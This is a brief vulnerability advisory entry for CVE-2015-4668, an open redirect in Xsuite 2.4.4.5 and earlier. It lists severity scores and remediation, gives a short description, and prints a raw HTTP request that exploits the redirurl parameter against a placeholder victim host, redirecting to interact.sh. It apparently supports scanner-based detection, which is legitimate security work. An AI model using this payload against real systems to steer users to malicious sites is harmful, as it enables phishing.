| Title | Xsuite <=2.4.4.5 - Open Redirect |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. |
| Remediation | Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.04202 |
| CVE ID | CVE-2015-4668 |
| CWE ID | CWE-601 |
| Tags | cve2015 cve redirect xsuite xceedium edb vuln |
Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.
GET /openwin.php?redirurl=http://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-4668.yaml
🦈 Packet Capture: ⬇️ Download cve-2015-4668.pcap
N/AN/A